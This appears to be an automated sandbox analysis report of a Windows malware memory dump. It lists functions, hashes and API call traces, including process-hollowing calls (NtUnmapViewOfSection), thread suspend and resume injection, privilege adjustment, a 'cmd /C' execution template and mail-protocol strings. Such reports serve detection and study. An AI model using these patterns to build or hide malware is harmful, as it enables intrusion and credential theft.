  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB47B, Relevance: 16.7, APIs: 11, Instructions: 187 Total matches: 59synchronizationstring
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1586, Relevance: 16.6, APIs: 11, Instructions: 78 Total matches: 43memoryfile
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7422, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 102 Total matches: 8processstring
Similarity
  • Total matches: 8
  • API ID: CreateProcessGetExitCodeProcessGetLastErrorWaitForMultipleObjectslstrlenmemsetwcstombs
  • String ID: D$cmd /C "%s> %s1"
  • API String ID: 1537746708-2226621151
  • Opcode ID: 8f43a44b104833d0f96806934345d3a8753fb5f9a1b6580f8a9b41b9e07b006e
  • Instruction ID: 189f0c3c70cc7b6004f2ba7acf1b9f38675443b636e617586de16067a78319dd
  • Opcode Fuzzy Hash: 3EF0C02508CBD197D4C33468270174BEA16AF211D2C4D6B91A6806A1885F0075D2575B
  • Instruction Fuzzy Hash: 189f0c3c70cc7b6004f2ba7acf1b9f38675443b636e617586de16067a78319dd
APIs
  • memset.NTDLL ref: 001C743A
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
  • wcstombs.NTDLL ref: 001C747D
  • CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
  • GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
  • GetLastError.KERNEL32 ref: 001C7507
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBB92, Relevance: 15.1, APIs: 10, Instructions: 109 Total matches: 83pipesynchronization
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF75B, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 172 Total matches: 23string
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
